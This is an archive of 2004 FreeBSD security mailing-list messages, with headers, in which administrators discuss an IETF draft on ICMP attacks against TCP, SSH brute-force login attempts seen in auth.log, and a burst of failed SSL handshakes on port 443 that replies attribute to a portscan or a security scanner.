List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 15:55:39 -0000 Has anyone seen the recently published IETF draft regarding ICMP attacks against TCP? [http://www.ietf.org/internet-drafts/draft-gont-tcpm-icmp-attacks-00.txt] I'm interested in any comments as to the vulnerability of FreeBSD's TCP to such attacks and the need for or usefulness of the various solutions proposed in the paper. Thanks, all - Steve -- Steve Zweep Senior Software Engineer BorderWare Technologies Inc. http://www.borderware.com From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 17:33:08 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1C3A616A4CE for ; Fri, 13 Aug 2004 17:33:08 +0000 (GMT) Received: from brainbox.winbot.co.uk (cpc2-mapp3-6-0-cust221.nott.cable.ntl.com [81.101.250.221]) by mx1.FreeBSD.org (Postfix) with ESMTP id D055043D48 for ; Fri, 13 Aug 2004 17:33:07 +0000 (GMT) (envelope-from brain@winbot.co.uk) Received: from brain.brainbox.winbot.co.uk ([10.0.0.2] helo=brain) by brainbox.winbot.co.uk with smtp (Exim 4.24; FreeBSD) id 1Bvfzw-000EPH-KA; Fri, 13 Aug 2004 18:37:48 +0100 Date: Fri, 13 Aug 2004 18:35:06 +0100 From: "Craig Edwards" To: "Sandor Berta" , "freebsd-security@freebsd.org" Organization: Crypt Software X-mailer: Foxmail 5.0 [en] Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Message-Id: Subject: Re: sequences in the auth.log X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list Reply-To: brain@winbot.co.uk List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 17:33:08 -0000 ive been getting this too on both my freebsd boxes, it seems to be an epidemic. i guess its some form of ssh scanner looking for open accounts with no passwords (or easily guessable passwords)? Thanks, Craig >Hi all, >I found similar sequences in the >165.21.103.20 port 39836 ssh2 >Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20 >Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57 >Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57 > >What are these? > From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 17:36:49 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0517A16A4CE for ; Fri, 13 Aug 2004 17:36:49 +0000 (GMT) Received: from relay.pair.com (relay.pair.com [209.68.1.20]) by mx1.FreeBSD.org (Postfix) with SMTP id 7C73D43D31 for ; Fri, 13 Aug 2004 17:36:48 +0000 (GMT) (envelope-from silby@silby.com) Received: (qmail 79771 invoked from network); 13 Aug 2004 17:36:47 -0000 Received: from niwun.pair.com (HELO localhost) (209.68.2.70) by relay.pair.com with SMTP; 13 Aug 2004 17:36:47 -0000 X-pair-Authenticated: 209.68.2.70 Date: Fri, 13 Aug 2004 12:36:48 -0500 (CDT) From: Mike Silbersack To: Steve Zweep In-Reply-To: <411CE478.3050607@borderware.com> Message-ID: <20040813123400.G1539@odysseus.silby.com> References: <411CE478.3050607@borderware.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed cc: freebsd-security@freebsd.org Subject: Re: ICMP attacks against TCP X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 17:36:49 -0000 On Fri, 13 Aug 2004, Steve Zweep wrote: > Has anyone seen the recently published IETF draft regarding ICMP attacks > against TCP? > [http://www.ietf.org/internet-drafts/draft-gont-tcpm-icmp-attacks-00.txt] > > I'm interested in any comments as to the vulnerability of FreeBSD's TCP to > such attacks and the need for or usefulness of the various solutions proposed > in the paper. > > Thanks, all > > - Steve Back when the RST semi-blind attacks came out, I double-checked our ICMP code for the same condition. It turns out that this was fixed by one of our developers years and years ago. I can't recall the exact version of the change now, but I believe it occured around 4.1 or 4.2. So, it could use some quick review, but I think we're good here. Mike "Silby" Silbersack From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 18:33:10 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 43C4C16A4CE for ; Fri, 13 Aug 2004 18:33:10 +0000 (GMT) Received: from cowbert.2y.net (d46h180.public.uconn.edu [137.99.46.180]) by mx1.FreeBSD.org (Postfix) with SMTP id 66CD743D31 for ; Fri, 13 Aug 2004 18:33:07 +0000 (GMT) (envelope-from sirmoo@cowbert.net) Received: (qmail 36062 invoked by uid 1001); 13 Aug 2004 18:33:04 -0000 Date: Fri, 13 Aug 2004 14:33:04 -0400 From: "Peter C. Lai" To: Mohacsi Janos Message-ID: <20040813183304.GU346@cowbert.net> References: <411CCAAE.7020505@beco.hu> <20040813160928.M82373@mignon.ki.iif.hu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20040813160928.M82373@mignon.ki.iif.hu> User-Agent: Mutt/1.5.6i cc: freebsd-security@freebsd.org Subject: Re: sequences in the auth.log X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 18:33:10 -0000 On Fri, Aug 13, 2004 at 04:14:29PM +0200, Mohacsi Janos wrote: > Hi Sandor, > You don't have to worry, unless you have user 'test', 'guest', > 'admin', 'root' with poor password: typically same or very similar to your > accountname. There seems to be a script around the hackers to scan SSH and > gain access to poorly configured servers.... Unfortunately they are plenty > of badly configured servers. May be you should disable root access via SSH > password (only via keys). Disabling root login via ssh will still cause 'failed password' entries in syslog. (on openssh 3.7 anyway) -- Peter C. Lai University of Connecticut Dept. of Molecular and Cell Biology Yale University School of Medicine SenseLab | Research Assistant http://cowbert.2y.net/ From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 19:19:16 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 90C6D16A4CE for ; Fri, 13 Aug 2004 19:19:16 +0000 (GMT) Received: from mail.ctch.net (mail.ctch.net [206.168.231.99]) by mx1.FreeBSD.org (Postfix) with SMTP id 5425043D48 for ; Fri, 13 Aug 2004 19:19:16 +0000 (GMT) (envelope-from gkuhn@ctch.net) Received: (qmail 14518 invoked from network); 13 Aug 2004 19:19:15 -0000 Received: from 63-227-123-49.dnvr.qwest.net (HELO ctch-fd59mrr24t.ctch.net) (gkuhn@ctch.net@63.227.123.49) by mail.ctch.net with SMTP; 13 Aug 2004 19:19:15 -0000 Message-Id: <6.1.2.0.2.20040813130613.02875fd0@mail.ctch.net> X-Sender: gkuhn@ctch.net@mail.ctch.net X-Mailer: QUALCOMM Windows Eudora Version 6.1.2.0 Date: Fri, 13 Aug 2004 13:19:12 -0600 To: freebsd-security@freebsd.org From: Gregory Kuhn In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Subject: Re: sequences in the auth.log X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 19:19:16 -0000 At 11:35 AM 8/13/2004, Craig Edwards wrote: >ive been getting this too on both my freebsd boxes, it seems to be an >epidemic. i guess its some form of ssh scanner looking for open accounts >with no passwords (or easily guessable passwords)? Just one more reason to mandate strict passwords for any accounts that have interactive shell access. It is also why we don't allow shell accounts to our users, with exception of a very small few (approximately 5 out of 200) and those users are required to maintain very strict passwords containing uppercase, lowercase, numeric and special characters in their passwords and they must be changed every 30 days and they are not allowed to reuse passwords...EVER! My personal experience with end-users (at least most of them) is given the opportunity, the end-user will opt for the easy to remember (a.k.a. easy to guess) password. We have all heard the jokes about the password being "password", its no joke...neither is first names, last names and so on...four letter passwords are a favorite of the average end-user too. lusers...you can't live with them, you can't live without them, you can only try to educate them. Greg > >165.21.103.20 port 39836 ssh2 > >Aug 13 13:56:35 www sshd[26113]: Illegal user test from 165.21.103.20 > >Aug 13 14:25:36 www sshd[26485]: Illegal user test from 202.28.120.57 > >Aug 13 14:25:41 www sshd[26487]: Illegal user guest from 202.28.120.57 > > > >What are these? > > > > >_______________________________________________ >freebsd-security@freebsd.org mailing list >http://lists.freebsd.org/mailman/listinfo/freebsd-security >To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" From owner-freebsd-security@FreeBSD.ORG Fri Aug 13 22:08:10 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1AEC716A4CE for ; Fri, 13 Aug 2004 22:08:10 +0000 (GMT) Received: from www.beco.hu (mail.beco.hu [212.108.197.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id A986743D1F for ; Fri, 13 Aug 2004 22:08:08 +0000 (GMT) (envelope-from berta@beco.hu) Received: from [127.0.0.1] (apache.beco.hu [82.131.147.112]) by www.beco.hu (8.12.11/8.12.11) with ESMTP id i7DM1Z2A031882 for ; Sat, 14 Aug 2004 00:01:37 +0200 (CEST) (envelope-from berta@beco.hu) Message-ID: <411D3BC3.6050402@beco.hu> Date: Sat, 14 Aug 2004 00:08:03 +0200 From: Sandor Berta User-Agent: Mozilla Thunderbird 0.7.1 (Windows/20040626) X-Accept-Language: hu-hu, hu MIME-Version: 1.0 To: freebsd-security@freebsd.org Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Subject: heavy load on port 443 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 13 Aug 2004 22:08:10 -0000 Hi, While I was working, the follwing message flud the screen. Aug 13 23:32:28 www /kernel: Limiting closed port RST response from 213 to 200 packets per second The /var/log/apache_ssl_engine.log started to grow with similar messages: [13/Aug/2004 23:43:49 66440] [error] SSL handshake failed (server www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows) [13/Aug/2004 23:43:49 66440] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different [13/Aug/2004 23:43:50 31633] [info] Connection to child 38 established (server www.beco.hu:443, client 217.102.90.240) [13/Aug/2004 23:43:50 31633] [info] Seeding PRNG with 1160 bytes of entropy [13/Aug/2004 23:43:51 31633] [error] SSL handshake failed (server www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows) [13/Aug/2004 23:43:51 31633] [error] OpenSSL: error:1406908F:SSL routines:GET_CLIENT_FINISHED:connection id is different I don't have the output of the following command: netstat -anfinet but it showed a lot of connection from the above IP. on port 443. Has any other effect of such attacks beside filling the /var/log? bye Sandor Berta From owner-freebsd-security@FreeBSD.ORG Sat Aug 14 01:32:20 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 51D5E16A4CE for ; Sat, 14 Aug 2004 01:32:20 +0000 (GMT) Received: from Neo-Vortex.Ath.Cx (203-206-229-73.dyn.iinet.net.au [203.206.229.73]) by mx1.FreeBSD.org (Postfix) with ESMTP id 17A9343D3F for ; Sat, 14 Aug 2004 01:32:19 +0000 (GMT) (envelope-from root@Neo-Vortex.Ath.Cx) Received: from localhost.Neo-Vortex.got-root.cc (Neo-Vortex@localhost.Neo-Vortex.got-root.cc [127.0.0.1]) by Neo-Vortex.Ath.Cx (8.12.10/8.12.10) with ESMTP id i7E1W4gC079639; Sat, 14 Aug 2004 11:32:07 +1000 (EST) (envelope-from root@Neo-Vortex.Ath.Cx) Date: Sat, 14 Aug 2004 11:32:04 +1000 (EST) From: Neo-Vortex To: Sandor Berta In-Reply-To: <411D3BC3.6050402@beco.hu> Message-ID: <20040814113142.H79402@Neo-Vortex.Ath.Cx> References: <411D3BC3.6050402@beco.hu> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII cc: freebsd-security@freebsd.org Subject: Re: heavy load on port 443 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 14 Aug 2004 01:32:20 -0000 more than likely someone is portscanning you... thats all... On Sat, 14 Aug 2004, Sandor Berta wrote: > Hi, > > While I was working, the follwing message flud the screen. > > Aug 13 23:32:28 www /kernel: Limiting closed port RST response from 213 > to 200 packets per second > > The /var/log/apache_ssl_engine.log started > to grow with similar messages: > > [13/Aug/2004 23:43:49 66440] [error] SSL handshake failed (server > www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows) > [13/Aug/2004 23:43:49 66440] [error] OpenSSL: error:1406908F:SSL > routines:GET_CLIENT_FINISHED:connection id is different > [13/Aug/2004 23:43:50 31633] [info] Connection to child 38 established > (server www.beco.hu:443, client 217.102.90.240) > [13/Aug/2004 23:43:50 31633] [info] Seeding PRNG with 1160 bytes of entropy > [13/Aug/2004 23:43:51 31633] [error] SSL handshake failed (server > www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows) > [13/Aug/2004 23:43:51 31633] [error] OpenSSL: error:1406908F:SSL > routines:GET_CLIENT_FINISHED:connection id is different > > I don't have the output of the following command: > netstat -anfinet > but it showed a lot of connection from the above IP. on port 443. > > Has any other effect of such attacks beside > filling the /var/log? > > bye > Sandor Berta > > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" > From owner-freebsd-security@FreeBSD.ORG Sat Aug 14 01:32:57 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 225E716A4CE for ; Sat, 14 Aug 2004 01:32:57 +0000 (GMT) Received: from Neo-Vortex.Ath.Cx (203-206-229-73.dyn.iinet.net.au [203.206.229.73]) by mx1.FreeBSD.org (Postfix) with ESMTP id ED2B143D1F for ; Sat, 14 Aug 2004 01:32:55 +0000 (GMT) (envelope-from root@Neo-Vortex.Ath.Cx) Received: from localhost.Neo-Vortex.got-root.cc (Neo-Vortex@localhost.Neo-Vortex.got-root.cc [127.0.0.1]) by Neo-Vortex.Ath.Cx (8.12.10/8.12.10) with ESMTP id i7E1WngC079647; Sat, 14 Aug 2004 11:32:49 +1000 (EST) (envelope-from root@Neo-Vortex.Ath.Cx) Date: Sat, 14 Aug 2004 11:32:49 +1000 (EST) From: Neo-Vortex To: Sandor Berta In-Reply-To: <411D3BC3.6050402@beco.hu> Message-ID: <20040814113212.U79402@Neo-Vortex.Ath.Cx> References: <411D3BC3.6050402@beco.hu> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII cc: freebsd-security@freebsd.org Subject: Re: heavy load on port 443 X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sat, 14 Aug 2004 01:32:57 -0000 oh, almost forgot, it could also be nessus or some other security scanner scanning your box too On Sat, 14 Aug 2004, Sandor Berta wrote: > Hi, > > While I was working, the follwing message flud the screen. > > Aug 13 23:32:28 www /kernel: Limiting closed port RST response from 213 > to 200 packets per second > > The /var/log/apache_ssl_engine.log started > to grow with similar messages: > > [13/Aug/2004 23:43:49 66440] [error] SSL handshake failed (server > www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows) > [13/Aug/2004 23:43:49 66440] [error] OpenSSL: error:1406908F:SSL > routines:GET_CLIENT_FINISHED:connection id is different > [13/Aug/2004 23:43:50 31633] [info] Connection to child 38 established > (server www.beco.hu:443, client 217.102.90.240) > [13/Aug/2004 23:43:50 31633] [info] Seeding PRNG with 1160 bytes of entropy > [13/Aug/2004 23:43:51 31633] [error] SSL handshake failed (server > www.beco.hu:443, client 217.102.90.240) (OpenSSL library error follows) > [13/Aug/2004 23:43:51 31633] [error] OpenSSL: error:1406908F:SSL > routines:GET_CLIENT_FINISHED:connection id is different > > I don't have the output of the following command: > netstat -anfinet > but it showed a lot of connection from the above IP. on port 443. > > Has any other effect of such attacks beside > filling the /var/log? > > bye > Sandor Berta > > _______________________________________________ > freebsd-security@freebsd.org mailing list > http://lists.freebsd.org/mailman/listinfo/freebsd-security > To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" >